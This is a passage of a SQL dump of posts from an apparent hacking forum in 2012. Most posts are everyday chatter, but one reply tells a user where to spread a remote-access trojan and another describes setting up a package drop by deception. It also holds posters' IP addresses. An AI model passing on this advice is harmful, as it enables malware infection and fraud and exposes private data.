'82', 'iTzIpod', '1351715840', 'Happy Halloween everyone! :)\nEnjoy your holiday.', '24.212.197.164', '416597412', '1', '0', '0', '0', '1', 'f16d466596669c8f924df1cc0adb27ef', '0', '0'); INSERT INTO mybb_posts VALUES('6786', '1091', '6338', '56', 'RE: Rate the avatar above you', '0', '82', 'iTzIpod', '1351715895', 'Lool HoverCatz!\n6/10. I don\'t like it :p Sowwie.', '24.212.197.164', '416597412', '1', '0', '0', '0', '1', '023f19f0636ba3d47661511d7d5336dd', '0', '0'); INSERT INTO mybb_posts VALUES('6787', '951', '5363', '71', 'RE: L33thacking Minecraft Server', '0', '82', 'iTzIpod', '1351715938', 'I would like to join and help build the server.', '24.212.197.164', '416597412', '1', '0', '0', '0', '1', 'f92ec68001c799eb46ca4db074b728ba', '0', '0'); INSERT INTO mybb_posts VALUES('6788', '1155', '6738', '3', 'RE: Happy Halloween', '0', '2', 'Apathy', '1351722026', 'Happy Halloween. Don\'t get too scared. xD', '173.206.130.116', '-1378975116', '0', '0', '0', '0', '1', 'c4f1ab907d4fc5abe603feecfcdb1e2c', '0', '0'); INSERT INTO mybb_posts VALUES('6789', '1146', '6710', '72', 'RE: DO NOT BUY NFS Most Wanted', '0', '2', 'Apathy', '1351722443', 'Thanks for the warning/heads up. :)', '173.206.130.116', '-1378975116', '0', '0', '0', '0', '1', '542c13632cdef8cdb62d4d6fa5c078a7', '0', '0'); INSERT INTO mybb_posts VALUES('6790', '951', '5363', '71', 'RE: L33thacking Minecraft Server', '0', '257', 'XxTREYZxX', '1351724213', 'Same i would love to OP on it so yeah', '203.104.11.11', '-882373877', '1', '0', '0', '0', '1', 'c4fd23e5fcee07a97f3d03997c29f7ec', '0', '0'); INSERT INTO mybb_posts VALUES('6791', '1143', '6705', '24', 'RE: NEED HELP', '0', '257', 'XxTREYZxX', '1351724473', 'Will hurricane sandy affect me if i am in Australia \nand sorry but hamachi does not work', '203.104.11.11', '-882373877', '1', '0', '0', '0', '1', 'fccf51ebcd5122432f34a76e8b7cf27d', '0', '0'); INSERT INTO mybb_posts VALUES('6792', '1159', '6782', '74', 'RE: More minecraft acc that might work', '0', '257', 'XxTREYZxX', '1351724535', '[quote=\'iTzIpod\' pid=\'6782\' dateline=\'1351715557\']\r\nNice share. But I don\'t need any accounts right now.\r\n[/quote]\r\n\r\nOk maybe you can sell the ones that work :O', '203.104.11.11', '-882373877', '1', '0', '0', '0', '1', '877568e8d5bf541cc5d853ad33661ffd', '0', '0'); INSERT INTO mybb_posts VALUES('6793', '1158', '6745', '74', 'RE: A few minecraft accounts that might work', '0', '257', 'XxTREYZxX', '1351724603', 'Yeah true i didn\'t bother to read the thread the thread when i wrote them so yeah sorry', '203.104.11.11', '-882373877', '1', '0', '0', '0', '1', 'be7b67dea0086d118a3184ed66adb661', '0', '0'); INSERT INTO mybb_posts VALUES('6794', '1124', '6541', '42', 'RE: 22-Year-Old Girl Sells Her Virginity Online', '0', '257', 'XxTREYZxX', '1351725473', 'Whoever buys her would want to keep her for long,make the most of her :)', '203.104.11.11', '-882373877', '1', '0', '0', '0', '1', 'afdcf19cbb664c7096154595a4993abc', '0', '0'); INSERT INTO mybb_posts VALUES('6795', '1125', '6542', '42', 'RE: Death by Monster energy drink', '0', '257', 'XxTREYZxX', '1351725637', 'Yeah different people have different immune systems and can handle it', '203.104.11.11', '-882373877', '1', '0', '0', '0', '1', '7df414f06f99a2d649b28a78d828aa0c', '0', '0'); INSERT INTO mybb_posts VALUES('6796', '1143', '6705', '24', 'RE: NEED HELP', '0', '82', 'iTzIpod', '1351726800', 'No it will not affect you. Um.\nYeah. Contact your ISP.', '24.212.197.164', '416597412', '1', '0', '0', '0', '1', '3115d81928e584a81a540a3cb022c091', '0', '0'); INSERT INTO mybb_posts VALUES('6797', '1159', '6746', '74', 'RE: More minecraft acc that might work', '0', '82', 'iTzIpod', '1351726834', 'But it\'s here for free. ._.', '24.212.197.164', '416597412', '1', '0', '0', '0', '1', '9c43ecd6b12475410d03b796794acb52', '0', '0'); INSERT INTO mybb_posts VALUES('6798', '1158', '6745', '74', 'RE: A few minecraft accounts that might work', '0', '82', 'iTzIpod', '1351726864', 'Can you fix your grammar please?', '24.212.197.164', '416597412', '1', '0', '0', '0', '1', '7cf09aeea429ac9da9f6ede8fb8a79bf', '0', '0'); INSERT INTO mybb_posts VALUES('6799', '1125', '6542', '42', 'RE: Death by Monster energy drink', '0', '61', 'NXK', '1351727773', 'I should probably stop drinking them ahah, I drink way to many.', '99.252.235.12', '1677519628', '1', '0', '0', '0', '1', '03ebb3c9df5868722e8073b288e77d80', '0', '0'); INSERT INTO mybb_posts VALUES('6800', '1099', '6533', '16', 'RE: Box Method and Drop Explained', '0', '61', 'NXK', '1351728048', '[quote=\'MinecraftGeek\' pid=\'6533\' dateline=\'1351421350\']\nI guess this could work but it\'s risky.\n[/quote]\n\nNot if you have a good drop, It\'s really easy to S.E a drop. Mines at A abandoned house and all I do is say i own the property and it\'s for my mom and it\'s her birthday so I don\'t want her to find it.\n\nDrops are a really good to have :)', '99.252.235.12', '1677519628', '1', '0', '61', '1351728069', '1', 'efb193900066ecc2c20269580599040e', '0', '1351728069'); INSERT INTO mybb_posts VALUES('6801', '1144', '6706', '11', 'RE: What can you do with?', '0', '67', 'HoverCatz', '1351728236', 'You can dox people with it', '178.74.57.144', '-1303758448', '1', '0', '0', '0', '1', '86194b9b472e269a53893f0a425edadc', '0', '0'); INSERT INTO mybb_posts VALUES('6802', '1143', '6705', '24', 'RE: NEED HELP', '0', '67', 'HoverCatz', '1351728324', 'What do you mean with it didnt work?', '178.74.57.144', '-1303758448', '1', '0', '0', '0', '1', 'c9aca3d18b77acd8da8322101c11d408', '0', '0'); INSERT INTO mybb_posts VALUES('6803', '1143', '6705', '24', 'RE: NEED HELP', '0', '257', 'XxTREYZxX', '1351734327', 'Turning off hamachi didnt solve the problem\nso yeah', '203.104.11.4', '-882373884', '1', '0', '0', '0', '1', '70d1c216eaf6628b4bcc8e82db2fd201', '0', '0'); INSERT INTO mybb_posts VALUES('6804', '1159', '6746', '74', 'RE: More minecraft acc that might work', '0', '257', 'XxTREYZxX', '1351734416', 'No like privately\nsell them to strangers :O', '203.104.11.4', '-882373884', '1', '0', '0', '0', '1', '2e6f9fd8669cf77fc98a66aa9190bed9', '0', '0'); INSERT INTO mybb_posts VALUES('6805', '1158', '6745', '74', 'RE: A few minecraft accounts that might work', '0', '257', 'XxTREYZxX', '1351734546', 'Sorry but what grammar did i miss :O', '203.104.11.9', '-882373879', '1', '0', '0', '0', '1', 'b66c13fb6b07c8d2414094ad551b5023', '0', '0'); INSERT INTO mybb_posts VALUES('6806', '1155', '6740', '3', 'RE: Happy Halloween', '0', '1', 't3h jok3r', '1351735700', '[quote=\'XxTREYZxX\' pid=\'6740\' dateline=\'1351662309\']\r\nThanks you joker and happy holloween to you to ,are you doing anything.\r\n[/quote]\r\n\r\nI had a couple of plans but got ruined by hurricane sandy.', '72.231.24.165', '1223104677', '1', '0', '0', '0', '1', 'c5b24f3a0eb23d4546f3144da35127a6', '0', '0'); INSERT INTO mybb_posts VALUES('6807', '1142', '6776', '24', 'RE: Fuck you Internet Explorer', '0', '1', 't3h jok3r', '1351735798', '[quote=\'iTzIpod\' pid=\'6776\' dateline=\'1351715123\']\r\nI use Google Chrome instead. It loads fast and looks simple and easy to use.\r\n[/quote]\r\n\r\nSame with me plus it reads every code properly and presents everything the way it should be unlike IE it shows messed up shit.', '72.231.24.165', '1223104677', '1', '0', '0', '0', '1', '6cebcd27e19ec2a412fd6ac4e112257d', '0', '0'); INSERT INTO mybb_posts VALUES('6808', '1148', '6775', '30', 'RE: [Crack] Limitless Logger 6.7 !!', '0', '1', 't3h jok3r', '1351735847', '[quote=\'VirtualLegend\' pid=\'6775\' dateline=\'1351710493\']\r\nWhat for program is it? Can you put more info about it\r\n[/quote]\r\n\r\nI think it\'s kinda self-explanatory and the preview pic explains what it is.', '72.231.24.165', '1223104677', '1', '0', '0', '0', '1', '177ccda56e0600347c1f4f92b83bd753', '0', '0'); INSERT INTO mybb_posts VALUES('6809', '1155', '6738', '3', 'RE: Happy Halloween', '0', '257', 'XxTREYZxX', '1351735944', 'OH yeah are you travelling alright', '203.104.11.7', '-882373881', '1', '0', '0', '0', '1', 'a6a8927df1a1ef6b0ff81e099b3b4808', '0', '0'); INSERT INTO mybb_posts VALUES('6810', '1145', '6709', '42', 'RE: Kim Kardashian Sex Tape (40 Mins - Warning 18+)', '0', '1', 't3h jok3r', '1351736396', 'I watched this shit and ENJOYED IT :D\n\nThanks and you should earn from this shit.', '72.231.24.165', '1223104677', '1', '0', '0', '0', '1', '6f42de774fb6011533f57caf43629250', '0', '0'); INSERT INTO mybb_posts VALUES('6811', '1164', '0', '11', 'RAT Help', '0', '160', 'Jacob', '1351737883', 'Well, I dont really know how to use Black Shades RAT.\r\n\r\nCould someone please tell me how, you would set it up, and spread it etc. I am pretty new when it comes to RATing, so I dont know really how I am supposed to set it up etc.\r\n\r\nJacob', '142.255.31.241', '-1895882767', '0', '0', '0', '0', '1', '9f06067c91294a6a50bad592c6cdf860', '0', '0'); INSERT INTO mybb_posts VALUES('6812', '1145', '6709', '42', 'RE: Kim Kardashian Sex Tape (40 Mins - Warning 18+)', '0', '61', 'NXK', '1351738179', 'Not going to lie I have watched this before and I found it funny enjoy mates.', '99.252.235.12', '1677519628', '1', '0', '0', '0', '1', 'd84c199fd8e1ce8bf666e7c941e43fb9', '0', '0'); INSERT INTO mybb_posts VALUES('6813', '1121', '6524', '20', 'RE: JodMod Crypter 1/35 cracked', '0', '61', 'NXK', '1351738386', 'This looks nice I might need to use this soon. Thanks for this.', '99.252.235.12', '1677519628', '1', '0', '0', '0', '1', '3b6467d536dabd4cc6d7bc74d4d7cea9', '0', '0'); INSERT INTO mybb_posts VALUES('6814', '1143', '6705', '24', 'RE: NEED HELP', '0', '1', 't3h jok3r', '1351740393', 'As p420 said, disable your anti virus firewall.', '72.231.24.165', '1223104677', '1', '0', '0', '0', '1', 'a3628b0bbd4ec4df44ca5d17051e6d3e', '0', '0'); INSERT INTO mybb_posts VALUES('6815', '1105', '6427', '24', 'RE: Windows 8 Officially released 26-10', '0', '1', 't3h jok3r', '1351740487', 'I got a new PC today and it came with windows 8. It looks great but still learning how to use this.', '72.231.24.165', '1223104677', '1', '0', '0', '0', '1', 'e6b8a33d0dfacdac57b8c2c02d8e65f8', '0', '0'); INSERT INTO mybb_posts VALUES('6816', '209', '819', '35', 'RE: Sick Mozilla Firefox Wallpaper/Desktop Background', '0', '1', 't3h jok3r', '1351740683', 'Set this as my desktop again. Bumping this so others can see this too.', '72.231.24.165', '1223104677', '1', '0', '0', '0', '1', '06e6b030a2dc0fe7dee2391c36082903', '0', '0'); INSERT INTO mybb_posts VALUES('6817', '1163', '6768', '35', 'RE: You Like it ? [ Rate My Graphic ]', '0', '1', 't3h jok3r', '1351740838', 'The picture is broken for me.', '72.231.24.165', '1223104677', '1', '0', '0', '0', '1', 'd15c1e0c5734f54462de435e200a0659', '0', '0'); INSERT INTO mybb_posts VALUES('6818', '1163', '6768', '35', 'RE: You Like it ? [ Rate My Graphic ]', '0', '257', 'XxTREYZxX', '1351743807', 'Same with me the pic is broken please fix', '203.104.11.10', '-882373878', '1', '0', '0', '0', '1', '6f12fbf572848c448da6c74dc6f22f9d', '0', '0'); INSERT INTO mybb_posts VALUES('6819', '1143', '6705', '24', 'RE: NEED HELP', '0', '257', 'XxTREYZxX', '1351743912', 'done that,still doesn\'t work \nany other suggestions', '203.104.11.3', '-882373885', '1', '0', '0', '0', '1', 'de1b0e68b28a785c979c209a92109f74', '0', '0'); INSERT INTO mybb_posts VALUES('6820', '1165', '0', '7', 'I m Back on LH:)', '0', '54', 'Sin Cara', '1351744218', 'So i after a long time i m back to LH :)', '119.154.20.81', '2006586449', '1', '0', '0', '0', '1', 'c7f20a2988460f65a70cc50e02bfaf64', '0', '0'); INSERT INTO mybb_posts VALUES('6821', '1165', '6820', '7', 'RE: I m Back on LH:)', '0', '228', 'VirtualLegend', '1351744392', 'Welcome Back, Hope you will stay active now :P', '83.83.167.183', '1397991351', '1', '0', '0', '0', '1', '54479cd1143990fb9d8e1997e9fadf89', '0', '0'); INSERT INTO mybb_posts VALUES('6822', '1163', '6817', '35', 'RE: You Like it ? [ Rate My Graphic ]', '0', '228', 'VirtualLegend', '1351744631', '[quote=\'t3h jok3r\' pid=\'6817\' dateline=\'1351740838\']\r\nThe picture is broken for me.\r\n[/quote]\r\n Thats Strange, gonna fix it', '83.83.167.183', '1397991351', '1', '0', '0', '0', '1', '0c191d4554760f30433b5bfcd0ebebc4', '0', '0'); INSERT INTO mybb_posts VALUES('6823', '989', '5544', '68', 'RE: Free Proxy script , Make your own Proxy browsing site like Hidemyass!!!', '0', '1', 't3h jok3r', '1351747521', 'Already knew about this because I made a proxy with this once. Thanks for sharing, it\'s useful and I believe 98% of proxies out on the internet are glype proxy.', '72.231.24.165', '1223104677', '1', '0', '0', '0', '1', '26bb7e90d18e7f862206ca19ed1661a8', '0', '0'); INSERT INTO mybb_posts VALUES('6824', '1166', '0', '46', '[Guide] Reporting Phishing Pages', '0', '1', 't3h jok3r', '1351748936', '[b]What is Phishing?[/b]\n\nPhishing is the act of attempting to acquire information such as usernames, passwords, and credit card details (and sometimes, indirectly, money) by masquerading as a trustworthy entity in an electronic communication.\n\n[b]How to recognize a phishing page?[/b]\n\nCheck the URL of the page. For example if the real URL is l33thacking.net then the phished URL would be l33thacking.c0m or l33thacknig.net.\n\nThe concept is to make the URL look identical to fool their victim.\n\n[b]What if I typed in my username and/or password?[/b]\n\nIf you just typed it in then you are safe but if you clicked enter, login, send etc then you have been successfully hacked so change your password as soon as possible.\n\n[b]How to report such messages?[/b]\n\nHere are a couple useful links to report phishing links.\n\nRecommended: http://www.antiphishing.org/report_phishing.html\n\n[u]Others[/u]\n\n[list]\n[*] https://www.google.com/safebrowsing/report_phish/\n[*] Forward phishing emails to spam@uce.gov\n[*] Contact the company being phished and in this case is l33thacking.net so use our contact form ;)\n[/list]', '72.231.24.165', '1223104677', '1', '0', '1', '1351917747', '1', '59ebfa8c25836e05696815842abdb0ab', '0', '1351917747'); INSERT INTO mybb_posts VALUES('6825', '1164', '6811', '11', 'RE: RAT Help', '0', '5', 'Timmy', '1351749079', 'I can help you set it up send me a PM.\n\nWhen it comes to spreading you can spread it on youtube, facebook, pastebin, porn sites, trick people into downloading the server etc.\n\nYou also need to portfward it.', '72.231.24.165', '1223104677', '1', '0', '0', '0', '1', '2bf3e1ddcf02eb76b17437a78e14abeb', '0', '0'); INSERT INTO mybb_posts VALUES('6826', '1167', '0', '75', 'Batman Arkham City Cheats', '0', '5', 'Timmy', '1351749505', '[b]All skins[/b]\r\nAt the main menu, press Left(2), Down(2), Left(2), Right, Up(2), Down to unlock an option to select any of the bonus skins. If you entered the code correctly, you will hear a sound when you continue your game. -From: Kevin Yanko\r\nBig head mode\r\nPull out the Cryptographic Sequencer, then hold LB + RB and rotate the Right Analog-stick clockwise ten times to make Batman\'s head and all enemy head\'s larger. Repeat the code to disable its effect.\r\n\r\n[b]New Game Plus mode[/b]\r\nSuccessfully complete the game on the Normal or Hard difficulty to unlock New Game Plus mode. This mode allows you to keep your previously earned gadgets and experience points. Additionally, there will not be any counter icons on thugs, thugs and Bosses will be more difficult, and thugs will have different configurations.\r\n\r\n[b]Taunting[/b]\r\nRotate the Right Analog-stick clockwise repeatedly to perform a taunt. Note: If you execute a taunt before performing a glide kick with Batman or Robin, the view will change to the enemy\'s perspective.\r\n\r\n[b]Alternate ending[/b]\r\n[b]Note:[/b] The alternate ending requires the bonus \"Catwoman\" downloadable content. In Catwoman\'s third mission, when you have the option to go left or right with the \"loot\", go right to view the alternate ending. You will still be able to go backwards and not ruin anything in the main campaign.\r\n\r\n[b]Hidden messages[/b]\r\n\r\nUse Batman\'s Cryptographic Sequencer to go to the following coordinates to intercept secret radio broadcasts that read numbers, make a buzzing sound, and then repeat the numbers again. When the numbers are matched to the corresponding letters of the alphabet, they spell out a hidden message. [b]Note:[/b] Some of the secret broadcasts may not be available until after completing the main campaign.\r\n\r\n[u]Hidden message 1[/u]\r\n[i]Location: X: 700.00, Y: 500.00\r\nMessage: 9-23-9-12-12-18-5-20-21-18-14-2-1-20-13-1-14\r\nDecoded message: \"I WILL RETURN BATMAN\"[/i]\r\n\r\n[u]Hidden message 2[/u]\r\n[i]Location: X: 500.00, Y: 900.00\r\nMessage: 5-15-9-7-21-18-18-14-3-5-24-15-12-7-22-3-10-5-15-9-22-3-8-25-26-15-16-25-10-15-17-25\r\nDecoded message: \"YOU WILL PAY FOR WHAT YOU HAVE DONE TO ME\"[/i]\r\n\r\n[u]Hidden message 3[/u]\r\n[i]Location: X: 200.00, Y: 500.00\r\nMessage: 3-20-26-18-26-16-24-1-11-4-24-9-3-8-5-2-12-18-6-16-7-11-3-10-17-5-13-4-21-8\r\nDecoded message: \"FEAR WILL TEAR GOTHAM CITY TO SHREDS\"[/i]\r\n\r\n[b]Easy Augmented Reality Challenge[/b]\r\nOne of the last four Augmented Reality Challenges appears to be difficult because you are supposed to execute a U-turn during your dive bomb. This can be done more easily by using the grapple boost going past the first checkpoint, then turning around while gliding. You can then glide through all the checkpoints much easier.\r\n\r\n[b]Easy high scores with Batman in Combat Challenges[/b]\r\nAlternate throwing the Batarang and evading or jumping over the heads of enemies until you get to do a special move (combo 5x or 8x). You can do this five times before it will not add to your multiplier. If it gets blocked, it should not break your combo. It seems throwing Batarangs in succession also works well, as you can throw at least two at a time, and it will not break a combo. Additionally, jump into the middle of enemies, and perform the Bat Swarm.\r\n\r\n[b]Harley Quinn pregnancy[/b]\r\nGo to the manager\'s office inside the Steel Mill. On the floor, next to the Harley Quinn costume, there is a positive pregnancy test.\r\n\r\n[b]Batman: Arkham City reference in Batman: Arkham Asylum[/b]\r\nIn the Warden\'s Office in Batman: Arkham Asylum, go back to the room with the Warden\'s portrait on the far wall. Turn left as soon as you enter the doorway, and approach the wooden wall. You can destroy it with Explosive Gel. It may take a few tries, but one of the panels on the wooden wall can be destroyed. Beyond the wooden wall is an unmarked room with a blueprint on the wall. It shows plans for the relocation or expansion of Arkham to Gotham City. This is a reference to the setting of Batman: Arkham City.\r\n\r\n[b]Killer Croc reference[/b]\r\nAfter you defeat Ra\'s al Ghul and are leaving the subway tunnels, instead of going the correct way, backtrack until you find a gate blocking your path. You should see a button on the far wall and a gap in the iron bars. Throw the Batarang through the gap to hit the button. There will be a cutscene with Killer Croc. Note: You cannot reach this area again after this point in the game.\r\n\r\n[b]Lost reference[/b]\r\nDuring the second visit to the Steelmill, you will see The Joker on the large TV. He will start talking about TV shows, and say \"How come it all ended in a church,\" which is a reference to the TV show, Lost.\r\n\r\n[b]Scarecrow reference[/b]\r\nNote: To access this secret room, you must have the upgraded Cryptographic Sequencer with the \"TYGER\" codes installed. Just north of the Industrial District in the Harbord, glide onto the Falcone boat west of the two cranes hanging over the water -- where you do the first set of Augmented Reality challenges. Use the Cryptographic Sequencer to hack the door on the boat. Enter \"CityofTerror\" as a password to open the hatch on the boat. Inside are a bunch of containers with cockroaches on them and a dead inmate. There is also a shipping invoice for Dr. J. Crane (Scarecrow\'s real name), hinting that Scarecrow did survive the Killer Croc encounter.', '72.231.24.165', '1223104677', '1', '0', '0', '0', '1', '13aa0a4f794787df0a9faf5d5fec4349', '0', '0'); INSERT INTO mybb_posts VALUES('6827', '1146', '6789', '72', 'RE: DO NOT BUY NFS Most Wanted', '0', '5', 'Timmy', '1351749562', '[quote=\'Apathy\' pid=\'6789\' dateline=\'1351722443\']\r\nThanks for the warning/heads up. :)\r\n[/quote]\r\n\r\nNo problem. Did you buy or pre-order it?', '72.231.24.165', '1223104677', '1', '0', '0', '0', '1', '19c2c4ba2e1986a6b0e4b36eb9173b21', '0', '0'); INSERT INTO mybb_posts VALUES('6828', '1168', '0', '73', 'Temple Run or Subway Surfer?', '0', '5', 'Timmy', '1351749623', 'Which one do you think is a better game, temple run or subway surfer?\r\n\r\nI vote for temple run.', '72.231.24.165', '1223104677', '1', '0', '0', '0', '1', 'd9ea096538b2b0a8af9b54cf07d758b4', '0', '0'); INSERT INTO mybb_posts VALUES('6829', '966', '5441', '61', 'RE: [99$] Lots of money for anything FAST! [LEAKED]', '0', '228', 'VirtualLegend', '1351749644', 'Thanks for the share bro !!!', '83.83.167.183', '1397991351', '1', '0', '0', '0', '1', 'b4ddbdae42aee5af0c0fbb446ba7de5d', '0', '0'); INSERT INTO mybb_posts VALUES('6830', '861', '4598', '7', 'RE: L33T Hacking Milestones', '0', '5', 'Timmy', '1351749674', 'Announcements section has 900 posts which means close to 1k', '72.231.24.165', '1223104677', '1', '0', '0', '0', '1', '16e515f4b6e804057458c40c36926c27', '0', '0'); INSERT INTO mybb_posts VALUES('6831', '1155', '6738', '3', 'RE: Happy Halloween', '0', '5', 'Timmy', '1351749722', 'Happy Halloween everyone i think im late for us now :(', '72.231.24.165', '1223104677', '1', '0', '0', '0', '1', '08c1dd76a8bcfa10bc4be358bc2abe92', '0', '0'); INSERT INTO mybb_posts VALUES('6832', '1153', '6780', '64', 'RE: Watch Prison Break full online for free', '0', '5', 'Timmy', '1351749785', 'Thanks for the link. I watched it already\r\n\r\n[quote=\'iTzIpod\' pid=\'6780\' dateline=\'1351715353\']\r\nThanks for the share! I\'ll share this with my friend who wants a Netflix account but won\'t buy it for $1.25 :p\r\nSo I\'ll be nice and give him this link.\r\n[/quote]\r\n\r\nLol good luck with selling netflix accounts.', '72.231.24.165', '1223104677', '1', '0', '0', '0', '1', '30b53a4c5d914f54e8081d670ee3cdb4', '0', '0'); INSERT INTO mybb_posts VALUES('6833', '1165', '6820', '7', 'RE: I m Back on LH:)', '0', '5', 'Timmy', '1351749829', 'Welcome back. What happened to your site?', '72.231.24.165', '1223104677', '1', '0', '0', '0', '1', 'c1275ea7b2dbca5c9c7877e352a80447', '0', '0'); INSERT INTO mybb_posts VALUES('6834', '1133', '6672', '83', 'RE: [Tutorial] Cheating on tests', '0', '5', 'Timmy', '1351749886', '[quote=\'Apathy\' pid=\'6672\' dateline=\'1351599528\']\r\nOr study and not possibly get a zero?\r\n[/quote]\r\n\r\nAnd let me be unique.\r\n\r\nOr just cheat and easy 100 :D', '72.231.24.165', '1223104677', '1', '0', '0', '0', '1', '3a7d213eab264f30eb50fa9a26509e31', '0', '0'); INSERT INTO mybb_posts VALUES('6835', '1139', '6666', '83', 'RE: [tutorial] How to bully and get away in US', '0', '5', 'Timmy', '1351749971', 'Thanks for this tutorial.\r\n\r\n[quote=\'PiXEL^OG\' pid=\'6666\' dateline=\'1351590319\']\r\nYou and this tutorial make me sick..\r\n[/quote]\r\n\r\nIt depends on how you take this i take it educationally because i learned abut a new rule in us.', '72.231.24.165', '1223104677', '1', '0', '0', '0', '1', '547b6e4587bf886a226b0c9c20a0acfb', '0', '0'); INSERT INTO mybb_posts VALUES('6836', '1169', '0', '3', 'Computing Tab Forum Suggestions', '0', '1', 't3h jok3r', '1351750138', 'I\'m planning on adding a couple more sections under the Computing Tab so if you would like to see a section then post them below.\n\nIf you have a section idea not for the computing tab then go ahead and post it. I will look over them and decide with NXK if they should be added or not.', '72.231.24.165', '1223104677', '1', '0', '1', '1351750157', '1', '46722d20668ed078948f25021eba7df9', '0', '1351750157'); INSERT INTO mybb_posts VALUES('6837', '1156', '6743', '64', 'RE: Walking dead', '0', '4', 'Triple H', '1351750256', 'thanks for the link but wrong section', '72.231.24.165', '1223104677', '1', '0', '0', '0', '1', 'd3af15357fedb4f01e7b0fe347463d68', '0', '0'); INSERT INTO mybb_posts VALUES('6838', '595', '2869', '65', 'RE: What movie did you watch recently?', '0', '4', 'Triple H', '1351750350', 'I just got down watching tokyo drift and i watched fast five too today', '72.231.24.165', '1223104677', '1', '0', '0', '0', '1', '6439cb6dc6a824cfddc7c054d5c8ffab', '0', '0'); INSERT INTO mybb_posts VALUES('6839', '1170', '0', '63', 'Need a sig', '0', '4', 'Triple H', '1351750388', 'I need a signature saying l33t hacking for myself', '72.231.24.165', '1223104677', '1', '0', '0', '0', '1', '4580c93fa1a32082c83634a2a13a2ce8', '0', '0'); INSERT INTO mybb_posts VALUES('6840', '1171', '0', '33', 'Anyone have photoshop cracked?', '0', '4', 'Triple H', '1351750472', 'Anyone have photoshop cracked for me?', '72.231.24.165', '1223104677', '1', '0', '0', '0', '1', '31d69121ce30e2a5bee30ceca6a303f3', '0', '0'); INSERT INTO mybb_posts VALUES('6841', '937', '5258', '19', 'RE: Nude Bot- Mr. Do you want to fap?', '0', '4', 'Triple H', '1351750663', 'AWESOME. Thank you for the link', '72.231.24.165', '1223104677', '1', '0', '0', '0', '1', 'a2e5a435b3cef64f23427f67cb09d93c', '0', '0'); INSERT INTO mybb_posts VALUES('6842', '861', '4598', '7', 'RE: L33T Hacking Milestones', '0', '4', 'Triple H', '1351750798', 'I reached 100 posts finally :D', '72.231.24.165', '1223104677', '1', '0', '0', '0', '1', 'b11b44002271dc3174f862b4d31ea7d3', '0', '0'); INSERT INTO mybb_posts VALUES('6843', '1172', '0', '83', '[tut]How to knock someone out[/video]', '0', '4', 'Triple H', '1351751050', '[video=youtube]https://www.youtube.com/watch?v=VCarSRnquLM[/video]\r\n\r\nEnjoy!', '72.231.24.165', '1223104677', '1', '0', '0', '0', '1', '6966a19c1360d1e7bb1139455760df87', '0', '0'); INSERT INTO mybb_posts VALUES('6844', '1172', '6843', '83', 'RE: [tut]How to knock someone out[/video]', '0', '257', 'XxTREYZxX', '1351751906', 'How come i cant watch this,it\'s just a white pic :O', '203.104.11.11', '-882373877', '1', '0', '0', '0', '1', 'd9b38b7f8cdba9bfc0e05d2ccccc5ab1', '0', '0'); INSERT INTO mybb_posts VALUES('6845', '959', '5435', '9', 'RE: How to make $50+ / Day with AdFoc or Adfly', '0', '1', 't3h jok3r', '1351753069', '[quote=\'iTzIpod\' pid=\'5435\' dateline=\'1350595297\']\r\nI know the creator of Customhits.net :3\r\n\r\n\r\n\r\nVery nice method. Tried it. Didn\'t work :p Lool\r\n[/quote]\r\n\r\nIt seriously didn\'t work or are you joking?', '72.231.24.165', '1223104677', '1', '0', '0', '0', '1', 'f526c1917ed4f21720e5d99ba8d57684', '0', '0'); INSERT INTO mybb_posts VALUES('6846', '1173', '0', '5', 'Request for LH staff', '0', '1', 't3h jok3r', '1351757796', 'Sup,\r\n\r\nI had a quick request. Can you guys please download the alexa toolbar or extension on your browsers and please visit LH everyday with the toolbar. This will increase our alexa ranking and will also get us more traffic.', '72.231.24.165', '1223104677', '1', '0', '0', '0', '1', '82dc80b8b478b2d50ecabb74a9fa3f93', '0', '0'); INSERT INTO mybb_posts VALUES('6847', '1165', '6833', '7', 'RE: I m Back on LH:)', '0', '54', 'Sin Cara', '1351757841', '[quote=\'Timmy\' pid=\'6833\' dateline=\'1351749829\']\r\nWelcome back. What happened to your site?\r\n[/quote]\r\n\r\nThe host is fucked up!!!', '119.154.66.74', '2006598218', '1', '0', '0', '0', '1', '02c62745f0fbd34133e6e696bfb64872', '0', '0'); INSERT INTO mybb_posts VALUES('6848', '1165', '6820', '7', 'RE: I m Back on LH:)', '0', '257', 'XxTREYZxX', '1351758151', 'I have never noticed you hello i am XxTREYZxX', '203.104.11.4', '-882373884', '1', '0', '0', '0', '1', '2157c0a22a05d661b4fe849c8f6177e9', '0', '0'); INSERT INTO mybb_posts VALUES('6849', '1168', '6828', '73', 'RE: Temple Run or Subway Surfer?', '0', '257', 'XxTREYZxX', '1351759279', 'I vote for subway surfer :L', '203.104.11.4', '-882373884', '1', '0', '0', '0', '1', '4832a819b532f88a2183da742911c052', '0', '0'); INSERT INTO mybb_posts VALUES('6850', '1167', '6826', '75', 'RE: Batman Arkham City Cheats', '0', '257', 'XxTREYZxX', '1351759494', 'Thanks Timmy for these i was browsing the web for these,thanks', '203.104.11.6', '-882373882', '1', '0', '0', '0', '1', 'ac51fb1a5a6d650995099a04be3a62e1', '0', '0'); INSERT INTO mybb_posts VALUES('6851', '1159', '6746', '74', 'RE: More minecraft acc that might work', '0', '82', 'iTzIpod', '1351769576', 'I do sell Minecraft Accounts (Premium) for $3.00/Account. o.O', '24.212.197.164', '416597412', '1', '0', '0', '0', '1', '036d41a090a84a20c403fd514c456dea', '0', '0'); INSERT INTO mybb_posts VALUES('6895', '861', '6889', '7', 'RE: L33T Hacking Milestones', '0', '1', 't3h jok3r', '1351822928', '[quote=\'iTzIpod\' pid=\'6889\' dateline=\'1351802615\']\r\nThanks Trey.\r\nAnd \'you\'re\' not \'your\'.\r\n[/quote]\r\n\r\nI would recommend PMing him his grammar mistakes as constant can be considered an insult and if it\'s done privately then the poster would be more comfortable.', '72.231.24.165', '1223104677', '1', '0', '0', '0', '1', 'dd82f2d2ff8641259a734569c7d1d2a4', '0', '0'); INSERT INTO mybb_posts VALUES('6853', '209', '819', '35', 'RE: Sick Mozilla Firefox Wallpaper/Desktop Background', '0', '82', 'iTzIpod', '1351769651', 'Lol thanks for the bump.\n:)', '24.212.197.164', '416597412', '1', '0', '0', '0', '1', 'a3f3d3a83c30e9c7c094e1595689f58d', '0', '0'); INSERT INTO mybb_posts VALUES('6854', '1163', '6768', '35', 'RE: You Like it ? [ Rate My Graphic ]', '0', '82', 'iTzIpod', '1351769682', 'I see you added a background to it.\nLooks better than before ;P', '24.212.197.164', '416597412', '1', '0', '0', '0', '1', '7c7eaee2dd6ff031a21eb3e269259354', '0', '0'); INSERT INTO mybb_posts VALUES('6855', '1155', '6738', '3', 'RE: Happy Halloween', '0', '82', 'iTzIpod', '1351769736', 'Didn\'t go trick or treating this year.\nI should go today! (November 